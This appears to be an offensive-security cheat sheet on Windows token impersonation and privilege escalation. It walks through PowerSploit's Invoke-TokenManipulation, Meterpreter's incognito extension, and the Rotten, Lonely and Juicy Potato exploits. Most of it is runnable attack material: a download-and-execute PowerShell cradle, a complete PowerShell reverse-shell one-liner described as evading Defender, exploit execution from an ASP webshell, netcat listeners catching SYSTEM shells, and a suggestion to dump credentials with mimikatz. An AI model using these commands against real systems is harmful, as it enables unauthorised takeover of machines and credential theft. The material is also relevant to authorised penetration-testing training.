Token Impersonation

Token Impersonation

Token impersonation is a technique you can use as local admin to impersonate another user logged on to a system. This is very useful in scenarios where you are local admin on a machine and want to impersonate another logged on user, e.g a domain administrator.


We can do token impersonation directly in powershell with a completely legitimate module. This will spawn a new thread as the user you impersonation, but it can be made to work in the same thread. Therefore, if you impersonate and then type whoami it might still show the original username, but you still have privs as your target user. If you do however spawn a new process (or a new shell) and migrate to that you will have a shell as the account you are impersonating.

Token impersonation is now a part of Powersploit

Invokes token impersonation as a domain user. If this doesn’t work you can try impersonating SYSTEM and then dumping credentials using mimikatz.

Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"

Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"

Get-Process wininit | Invoke-TokenManipulation -CreateProcess "cmd.exe"

As a replacement for the last command you could do, but be vary of special characters in the command like " and ' Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('');\"};"

Rotten potato exploit

The rotten potato exploit is a privilege escalation technique that allows escalation from service level accounts to SYSTEM through token impersonation. This can be achieved through uploading an exe file exploit and executing or through memory injection with psinject in either Empire or Metasploit. See Foxglove security’s writeup of the exploit for more detail.


Get a meterpreter shell as a service account and upload rot.exe to the box.

getuid – shows who you are, like whoami getprivs – shows you available tokens for impersonation getsystem – allows SYSTEM token impersonation directly in meterpreter if local admin use incognito – loads an extension that allows token impersonation list_tokens -u – lists available impersonation and delegation tokens

Now this is not very nice, but upload the exploit to disk Now you can use meterpreter’s feature of executing binaries straight into memory and if that doesn’t work upload it to disk as a dll and use rundll32 to execute it.

execute -H -c -m -d calc.exe -f /root/rot.exe upload rot.dll "c:\temp\rot.dll" execute -H -c -f "rundll32 c:\temp\rot.dll,Main Now do list_tokens -u again, and an impersonation token for SYSTEM should be available. You can then impersonate using impersonate_token "NT AUTHORITY\SYSTEM"

Congratulations, you are now system

Lonely potato

I did this on Windows 10 with Defender and nothing triggered. You could probably implement a better obfuscated reverse shell if you like.

Make a powershell reverse shell and put it in a file test.bat.

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('',53);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (IEX $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Upload it to the target machine on c:\windows\temp\test.bat. The directory doesn’t really matter, this is just an example.

Upload MSFRottenPotato.exe to your target machine. Now depending on what token privs you have you can use this exploit. So enumerate your token privs with:

whoami /priv

If you only have SeImpersonatePrivilege you can use the CreateProcesAsUser, (t) argument. If you have both SeImpersonatePrivilege and SeAssignPrimaryToken you can use CreateProcessWithTokenW, (*) argument.

Set up your listener in empire, metasploit, netcat or whatever you prefer.

Execute it for example in your asp webshell with

c:\users\public\MSFRottenPotato.exe t c:\users\public\test.bat
 `\users\public\MSFRottenPotato.exe t c:\users\public\test.bat
 The server's port: 80 The server's software: Microsoft-IIS/8.0 The server's software: 0 0 CreateDoc: 0 0 connect sock start RPC connection COM -> bytes received: 116 RPC -> bytes Sent: 116 RPC -> bytes received: 84 COM -> bytes sent: 84 COM -> bytes received: 24 RPC -> bytes Sent: 24 RPC -> bytes received: 224 COM -> bytes sent: 224 COM -> bytes received: 129 RPC -> bytes Sent: 129 RPC -> bytes received: 252 COM -> bytes sent: 252 COM -> bytes received: 158 RPC -> bytes Sent: 158 RPC -> bytes received: 56 COM -> bytes sent: 56 CoGet: -2147022986 0 [+] authresult != -1 [+] Elevated Token tye:2 [+] DuplicateTokenEx :1 0 [+] Duped Token type:1 [+] Running c:\users\public\test.bat sessionId 3 [+] CreateProcessWithTokenW OK Auth result: 0 Return code: 0 Last error: 0

Congratulations, you are now system, see below

root@kali:/usr/share/webshells/asp# nc -lvp 53
listening on [any] 53 ... inverse host lookup failed: Unknown host
connect to [] from (UNKNOWN) [] 52773
nt authority\system

Juicy Potato

PS C:\users\public> ./jp.exe -t * -p c:\users\public\herculesshell53.exe -l 1335 -c "{4991d34b-80a1-4291-83b6-3328366b9097}"
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1335
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK
PS C:\users\public>
C:\Users\jacco>nc -lvp 53
listening on [any] 53 ...
connect to [] from HERCULES [] 49188

PS C:\Windows\system32> whoami
nt authority\system